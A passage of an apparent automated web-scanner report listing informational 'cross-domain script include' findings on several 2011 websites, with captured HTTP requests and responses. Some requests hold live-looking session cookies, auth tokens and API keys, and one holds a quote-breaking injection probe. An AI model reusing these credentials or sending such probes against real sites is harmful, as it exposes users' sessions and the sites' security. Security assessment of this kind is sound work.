Connection: keep-alive
Referer: http://west.thomson.com/store/secure/ShoppingBasket.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; s_cc=true; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%5D; s_ppv=66; c_m2=1; c=undefined645229L86530undefined; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Bankruptcy%20Exemption%20Manual%2C%202010%20ed.%20%28West%27s%26%23174%3B%20Bankruptcy%20Series%29; s_sq=thwest%3D%2526pid%253DBankruptcy%252520Exemption%252520Manual%25252C%2525202010%252520ed.%252520%252528West%252527s%252526%252523174%25253B%252520Bankruptcy%252520Series%252529%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BshowPopupBubble%252528%252527ctl00%252524placeHolderTopNavigation%252524placeHolderContent%252524ctl00%252524popu%2526oidt%253D2%2526ot%253DIMAGE; UserSiteIdIdentifier=; .WTCAUTH=9DFF38C2ED245A836B638A4FD2BB05048EFDFD2A3F3BC8DC4D0876357DAC06B163234E108A8F0DA6FFB919F8831205FF1893BF274F77770E9447A6CF6832F99911CAEA4F06343A555BDF7037EBDAD0392A3B821D6A252C115D9D10A1FD2B10DE395F8581D4BBE49B8B4EF6A088A00BE982BA5CBAAC1C23CD6D40E8E10C4A8CB90101D3CE531D7618D4A99EC6ED09D86A6A87BEB92C84EBB5541C5F4267CA16C317ED73CD9AD52E9BCFFCFA39E7A4F7561999EF701967F4FAEE3513AC9E115F783D6CA97286E2B3D06563DA39F267FA170B8C51C76EEB06DDD6F99A112D49B9ED48435EDE

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:04:45 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=C92933A45E8BBE47C7EEF54F80B6D25789CF3B0DE11279B4960956BC8BB0E345579BADF326956E9721B67D71932107D3B64238D6EE6707D06C81817121C5953C161DDD49619F87B8AE2E421C792976F48CA556F7DB0C834EB3BE231FCF4A767E58A07AA7485840E793C3A65F7DEB1BA7BD4CA2E971C144356D50FC6DD68AFCB7569D943E22EBDA2359D2DDAFEEB65197678B43B591B46F28E9EA05EC9F8FE84A521E37C1F57160F4EE7D67E36501BABC3987B29619274E9EBC26949903E1FDAEC56DB8129C91303E8A4BE5A28D8839FB0A532C6B8B24419839BF14AB2C51AD3259D6DF7F; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 134558


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta c
...[SNIP]...
<link rel="stylesheet" type="text/css" href='https://west.thomson.com/noexpire/combined.5.1.421.22.min.css' />
<script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js'></script>
<script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js'></script>
...[SNIP]...
</script>

<script type='text/javascript' src='https://media.richrelevance.com/rrserver/js/0.4/p13n.js'></script>
...[SNIP]...
</script><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=wtcthomsonreuters">

                   </script>
...[SNIP]...
<!-- begin Marin Software Tracking Script -->
<script src='https://tracker.marinsm.com/tracker/787f8z6077.js' type='text/javascript'></script>
...[SNIP]...

20.62. https://west.thomson.com/support/customer-service/order-info.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://west.thomson.com
Path:   /support/customer-service/order-info.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /support/customer-service/order-info.aspx HTTP/1.1
Host: west.thomson.com
Connection: keep-alive
Referer: https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx?Mstr=wtc&PromCode=571419&FindingMethod=Navigation
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; UserSiteIdIdentifier=; .WTCAUTH=E76869171E1A0ADDDC87DE0666682051A5ABA524C2901C7CCEF31A6788A7A438C98C00E7ABD27B50057AA9B35AF82318BE32CAAF21BCE46BA3E3E2EF6BAD7265022CF6605B0D106AF37CB15E717B49BE7FA125545B49CD98D1796358E96925E259D28F2A8CB5B16681BF5B9DE5EB533CEFC7E936BC98024D18199973772A2B0420054643FF9639F13C27CBBB80C1152B2BC7EF70BDEC6C72A6C3ED2F16912510EBC9C641BEB2DCBD2784D94A08DAC3A2CB0C92EBE86CA6DAE5A52262E83175C215F1D237D9058600C65D041AC94F24F8BD7FAFEA186A82F05284BBAB97540DA15E7C4840; s_cc=true; s_ppv=100; c_m2=1; c=undefined571419undefined; SC_LINKS=store%3Apromotions%3Aemailpreferences%3Alogin%5E%5EFree%20Ground%20Shipping%5E%5Estore%3Apromotions%3Aemailpreferences%3Alogin%20%7C%20Free%20Ground%20Shipping%5E%5E; s_ev48=%5B%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%2C%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849781175%27%5D%5D; gpv_pn=store%3Apromotions%3Aemailpreferences%3Alogin; s_sq=thwest%3D%2526pid%253Dstore%25253Apromotions%25253Aemailpreferences%25253Alogin%2526pidt%253D1%2526oid%253Dhttps%25253A//west.thomson.com/support/customer-service/order-info.aspx%252523freeshipping%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:43:57 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: .WTCAUTH=1A21DC8B98A96EC21459B14B79587A583EC2F9BC37D2E75B5317EF0E65FAFEF6730683DB17DCF2BE06F0B1B98854DE5A707FC465E78510565D9EB9DAE71D857891B9157BA899B658EA734F816E3CE32760B05F6B24F34F4DF7A20D01665DF7E18DCAAC70E57C6EDF44A0197593C73CA0FAE6C559214D35FC361C5715FE43DBF19C70EBD085C78E9E5F286FC92ED8B559596ABC60CEFF4372C361E9E899AF7753D44DE2EF1A434F6907AE0EEE63371718A38CBFF23D5698B65E6F218C4AEADA2868A458441D2D6450C6DDD153EDB3A2CE7A069305EEEB72793F81C52FB84EB011536FEF0B; expires=Tue, 26-Apr-2011 21:13:49 GMT; path=/; HttpOnly
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=62C8AFF94277E664484BBE7EC8277401DE5ADF5C5AEAF45D558739ADCD8069717EDC476F9611DA2668E59CB60B963048A7292391B9104F44FFCFB680230472EE9A68B087279430B80A9137BCF51FCBBE8CAA2B5135B21DAB33E2FF00B71448413EC9C7D9166F621CB8C527C88854A6B0E4DFD5CD34D4666CDACDA3442EF9704AA677452920C07B5940C397045601366D36704513C6FE9B69419D140474085B16735382FEB803D48FC173BBAFD3334424BF0894189520BF2901A304307E3DC9E63E08D54BB0A62CFE50A8B440B11838DBAA606EC4F2C964E593D9C23819FB20FA690F28E5; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 87568


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><m
...[SNIP]...
<link rel="stylesheet" type="text/css" href='https://west.thomson.com/noexpire/combined.5.1.421.22.min.css' />
<script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js'></script>
<script type="text/javascript" src='https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.6/jquery-ui.min.js'></script>
...[SNIP]...
</script>

<script type='text/javascript' src='https://media.richrelevance.com/rrserver/js/0.4/p13n.js'></script>
...[SNIP]...
</script><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=wtcthomsonreuters">

                   </script>
...[SNIP]...
<!-- begin Marin Software Tracking Script -->
<script src='https://tracker.marinsm.com/tracker/787f8z6077.js' type='text/javascript'></script>
...[SNIP]...

20.63. http://www.aac.org/site/TR/Events/AWB08  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aac.org
Path:   /site/TR/Events/AWB08

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /site/TR/Events/AWB08?pg=team&fr_id=1110&team_id=24880 HTTP/1.1
Host: www.aac.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:44:06 GMT
Server: Apache
Cache-Control: private
Set-Cookie: JServSessionIdr004=839fd626r1.app209a; path=/
Content-Type: text/html
Content-Length: 26372

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>

<head>


<base href="http://www.aac.org/site/" />


<title>AIDS Walk Boston, Sunday, June 5, 2011: </title>
<meta http-equiv="C
...[SNIP]...
<td align="center" valign="top"><script type="text/javascript" src="http://cdn.widgetserver.com/syndication/subscriber/InsertWidget.js"></script>
...[SNIP]...

20.64. http://www.allpages.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.allpages.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /?980251%22';944334 HTTP/1.1
Host: www.allpages.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 19:11:16 GMT
Server: Apache/2.2.3 (Red Hat)
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48763

<html>
<head>

<title>AllPages.com - Browse by Category - Yellow Pages</title>


<meta name="Description" content="AllPages.com Yellow Pages provides business listings (name, address, phone, fax
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...

20.65. http://www.allpages.com/agriculture/farm-equipment/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.allpages.com
Path:   /agriculture/farm-equipment/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /agriculture/farm-equipment/ HTTP/1.1
Host: www.allpages.com
Proxy-Connection: keep-alive
Referer: http://www.allpages.com/?980251%22';944334
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 19:11:24 GMT
Server: Apache/2.2.3 (Red Hat)
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26802

<html>
<head>

<title>AllPages.com - Farm Equipment - Yellow Pages</title>


<meta name="Description" content="AllPages.com Yellow Pages provides business listings (name, address, phone, fax) fo
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
</script>

<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en"></script>
...[SNIP]...
<td class="fb2" align="center">
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script>
<script type="text/javascript"
SRC="http://kona.kontera.com/javascript/lib/KonaLibInline.js">
</script>
...[SNIP]...

20.66. http://www.aptm.phoenix.edu/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aptm.phoenix.edu
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:45:12 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181439)/JBossWeb-2.0
Set-Cookie: linkplidlist=47060; Domain=.phoenix.edu; Path=/
Set-Cookie: crk=134809332.2; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 21:59:19 GMT; Path=/
Set-Cookie: vid=51857023; Domain=.phoenix.edu; Path=/
Set-Cookie: country=US; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 21:59:19 GMT; Path=/
Set-Cookie: postal_code=5672; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 21:59:19 GMT; Path=/
Set-Cookie: plid=47060; Domain=.phoenix.edu; Expires=Sun, 14-May-2079 21:59:19 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 44049

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca
...[SNIP]...
<!-- MVT Rotation test: D55602D1FF1E5348 -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

20.67. http://www.bertelsmann.com/bertelsmann_corp/wms41/bm/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bertelsmann.com
Path:   /bertelsmann_corp/wms41/bm/index.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /bertelsmann_corp/wms41/bm/index.php?language=2 HTTP/1.1
Host: www.bertelsmann.com
Proxy-Connection: keep-alive
Referer: http://www.bertelsmann.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: info=@/@1920x1200

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 22:40:20 GMT
Server: Apache/2.2.15 (Fedora)
X-Powered-By: PHP/5.2.11
Set-Cookie: BERTELSMANN_CORP_BEESITE=054ecf29cc8b85f5cefba0141cab9674; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: must-revalidate, no-cache
Pragma: no-cache
P3P: CP="IDC ADM DEV PSAi OUR IND ONL COM NAV"
Last-Modified: Tue, 26 Apr 2011 22:40:20 GMT
Cache-Control: private, no-cache
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 32405

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Bertelsmann - me
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/addthis_widget.php?v=12"></script>
...[SNIP]...

20.68. http://www.careerbuilder.com/iframe/recommendedcvupload.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.careerbuilder.com
Path:   /iframe/recommendedcvupload.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /iframe/recommendedcvupload.aspx?pagever=NewMSN HTTP/1.1
Host: www.careerbuilder.com
Proxy-Connection: keep-alive
Referer: http://msn.careerbuilder.com/msn/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CB%5FSID=66ee7709ffa3453389de6128eeb18875-357143948-w4-6; BID=X1B5CE6DB054A3B8D64198121F94D45E247F1DE3EBA3E204F258F8D2F5D9E98B1FB41E77395140550B900D87EFE23B4943

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: REBEL48
Date: Tue, 26 Apr 2011 18:40:29 GMT
Connection: close
Content-Length: 45725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Find J
...[SNIP]...
</script><script type="text/javascript" src="http://img.icbdr.com/Common/js/cblibraryajaxbase.min.js"></script><script type="text/javascript" src="http://img.icbdr.com/v12.51/Common/js/jquery/jquery-1.3.2.min.js"></script><script type="text/javascript" src="http://img.icbdr.com/v12.51/Common/js/jobseeker/ads/delayedad.js"></script><script type="text/javascript" src="http://img.icbdr.com/v12.51/Common/js/recommendedforyou.js"></script><script type="text/javascript" src="http://img.icbdr.com/v12.51/Common/js/emailvalidator.js"></script><script type="text/javascript" src="http://img.icbdr.com/v12.51/Common/js/popup.js"></script>
...[SNIP]...
</script>
<script language="JavaScript" src="http://img.icbdr.com/common/js/SiteCatalystH.js"></script>
...[SNIP]...

20.69. http://www.computerworld.com/s/article/9216003/Texas_fires_two_tech_chiefs_over_breach  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.computerworld.com
Path:   /s/article/9216003/Texas_fires_two_tech_chiefs_over_breach

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /s/article/9216003/Texas_fires_two_tech_chiefs_over_breach?taxonomyId=17 HTTP/1.1
Host: www.computerworld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=22922409.1116149048.1303476387.1303476387.1303476387.1; __utmz=22922409.1303476387.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __switchTo5x=60; __unam=8eb1eeb-12f7d3f43b2-c1bcf53-1

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
piExres: Tue, 26 Apr 2011 22:00:36 GMT
nnCoection: close
Cheac-Control: private
ETag: "KXAOEEJGPLWLQSPYV"
Vary: Accept-Encoding
Cache-Control: public, max-age=521
Expires: Tue, 26 Apr 2011 22:00:49 GMT
Date: Tue, 26 Apr 2011 21:52:08 GMT
Connection: close
Content-Length: 134301

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascri
...[SNIP]...
</script>

           <script type="text/javascript" src="http://content.dl-rms.com/rms/mother/573/nodetag.js"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=4aa25eb10e6f9884a91e9805c3fcb58ec1cd8407&callback=dbase_parse"></script>
...[SNIP]...
</script>
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=tweettrackjs&apiKey=R_7e9987b2fd13d7e4e881f9cbb168f523"></script>
<script type="text/javascript" charset="utf-8" src="http://s.bit.ly/TweetAndTrack.js?v=1.01"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=searchbox_014839440456418836424%3A-khvkt1lc-e"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://wd.sharethis.com/button/buttons.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.simplyhired.com/c/job-widget/js/widget.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://jlinks.industrybrains.com/jsct?sid=756&ct=COMPUTERWORLD_SECURITY&tr=MARKETPLACE&num=5&layt=1&fmt=simp"></script>
...[SNIP]...

20.70. http://www.computerworlduk.com/news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.computerworlduk.com
Path:   /news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/security/3276305/oracle-responds-to-hacker-group-and-patches-javacom-vulnerability/?olo=rss HTTP/1.1
Host: www.computerworlduk.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
Set-Cookie: JSESSIONID=6230266d0f7d1fe0d9aa114e2114b137a4f1;path=/
Set-Cookie: JSESSIONID=6230266d0f7d1fe0d9aa114e2114b137a4f1;domain=.computerworlduk.com;path=/
Date: Tue, 26 Apr 2011 21:49:09 GMT
Connection: close


       <!DOCTYPE html>
   <html>
       <head><script type="text/javascript">/* <![CDATA[ */_cf_loadingtexthtml="<img alt=' ' src='/CFIDE/scripts/ajax/resources/cf/images/loading.gif'/>";
_cf_contextpath=""
...[SNIP]...
<![endif]-->
   <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost&amp;embeds=true&amp;charset=utf-8&amp;services=digg%2Cslashdot%2Cstumbleupon%2Creddit%2Cmixx%2Cdelicious%2Ctechnorati%2Cyahoo_buzz%2Cfacebook&amp;style=default&amp;publisher=dff1640b-f471-4781-9319-20022d66580e&amp;linkfg=%236e6e6e"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://widgets.digg.com/buttons.js"></script>
...[SNIP]...
<li id="tweetArticle"><script type="text/javascript" src="http://tweetmeme.com/i/scripts/button.js"></script>
...[SNIP]...

20.71. http://www.criticalwatch.com/vulnerability-management.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.criticalwatch.com
Path:   /vulnerability-management.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /vulnerability-management.aspx HTTP/1.1
Host: www.criticalwatch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=164981229.1303732829.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=164981229.1572272348.1303732829.1303732829.1303735956.2

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 26 Apr 2011 21:48:42 GMT
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Vary: Accept-Encoding
Content-Length: 12806


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta name="descrip
...[SNIP]...
<!-- Google Adwords BEGIN -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

20.72. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/like.php?&width=400&height=80&layout=standard&show_faces=true&action=like&font=arial&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110426_0700%26ssh%3DS583531935%26FORM%3DHPFBLK%26mkt%3Den-US%26 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/?scope=web&mkt=en-US&FORM=MSMONY
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
